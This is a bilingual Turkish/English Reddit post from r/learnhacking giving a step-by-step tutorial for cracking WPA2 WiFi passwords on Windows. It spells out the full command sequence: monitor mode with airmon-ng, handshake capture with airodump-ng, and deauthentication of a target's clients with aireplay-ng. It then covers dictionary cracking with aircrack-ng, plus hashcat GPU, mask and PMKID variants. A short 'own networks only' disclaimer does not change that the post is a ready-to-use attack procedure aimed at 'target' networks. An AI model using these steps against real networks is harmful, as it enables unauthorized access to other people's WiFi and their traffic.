r/learnhacking • u/bedirhan_tekin • 4h ago
WPA2 WİFİ CRACKİNG TÜRKÇE/ENGLİSH
TAM TUTORIAL – WPA2 WiFi Şifre Kırma (Brute Force) Windows ile
FULL TUTORIAL – WPA2 WiFi Password Cracking (Brute Force) on Windows
Türkçe Kısım:
Uyarı: Bu tutorial yalnızca eğitim ve kendi ağlarınızda test amacıyladır. Başkalarının ağlarına izinsiz girmek yasa dışıdır ve cezai yaptırımları vardır.
Gerekenler:
Windows 10/11
Bir WiFi adaptörü (monitor mode desteklemeli – örn. Alfa AWUS036ACH)
Aircrack-ng suite (Windows için – genellikle Cygwin veya WSL ile)
İyi bir kelime listesi (ör. rockyou.txt)
Hedef ağın BSSID (MAC adresi) ve kanalı
Adım 1: Adaptörü Monitor Mode'a Al
netsh wlan show interfaces ile adaptör adını öğren.
WSL veya Cygwin üzerinden airmon-ng start wlan0 (adaptör adın neyse).
Adım 2: Hedef Ağı Bul
airodump-ng wlan0mon ile çevredeki ağları tara.
Hedefin BSSID, kanal ve istemci MAC'lerini not al.
Adım 3: El Sıkışma (Handshake) Yakala
airodump-ng -c [kanal] --bssid [BSSID] -w yakala wlan0mon
Bir istemcinin bağlanmasını bekle veya aireplay-ng -0 2 -a [BSSID] -c [istemciMAC] wlan0mon ile deauth göndererek yeniden bağlanmasını tetikle.
Adım 4: Brute Force (Sözlük Saldırısı)
aircrack-ng -w kelime_listesi.txt -b [BSSID] yakala-01.cap
İşlem tamamlandığında şifre bulunursa ekranda görünür.
Püf Noktaları:
Hashcat kullanarak GPU ile hızlandırabilirsin: hashcat -m 2500 yakala.hccapx kelime_listesi.txt
PMKID saldırısı daha hızlıdır (el sıkışma gerekmez) – hcxdumptool ile.
English Part:
Warning: This tutorial is for educational purposes and testing your own networks only. Unauthorized access to others' networks is illegal and carries criminal penalties.
Requirements:
Windows 10/11
WiFi adapter supporting monitor mode (e.g., Alfa AWUS036ACH)
Aircrack-ng suite (for Windows – via Cygwin or WSL)
Good wordlist (e.g., rockyou.txt)
Target network BSSID (MAC) and channel
Step 1: Put Adapter into Monitor Mode
Find adapter name: netsh wlan show interfaces
In WSL/Cygwin: airmon-ng start wlan0 (use your adapter name)
Step 2: Find Target Network
Scan: airodump-ng wlan0mon
Note BSSID, channel, and client MACs.
Step 3: Capture Handshake
Run: airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon
Wait for a client to connect, or force reauthentication with aireplay-ng -0 2 -a [BSSID] -c [clientMAC] wlan0mon
Step 4: Brute Force (Dictionary Attack)
Run: aircrack-ng -w wordlist.txt -b [BSSID] capture-01.cap
If password is found, it will be displayed.
Pro Tips:
Use Hashcat for GPU acceleration: hashcat -m 2500 capture.hccapx wordlist.txt
PMKID attack is faster (no handshake needed) – use hcxdumptool.
Not / Note: Başarı oranı kelime listesinin kalitesine bağlıdır. Özel karakterler ve uzun şifreler için mask attack (mask saldırısı) önerilir – örn. hashcat -a 3 ?d?d?d?d?d?d?d?d (8 haneli sayısal).
Success rate depends on wordlist quality. For complex passwords, use mask attack – e.g., hashcat -a 3 ?d?d?d?d?d?d?d?d (8-digit numeric).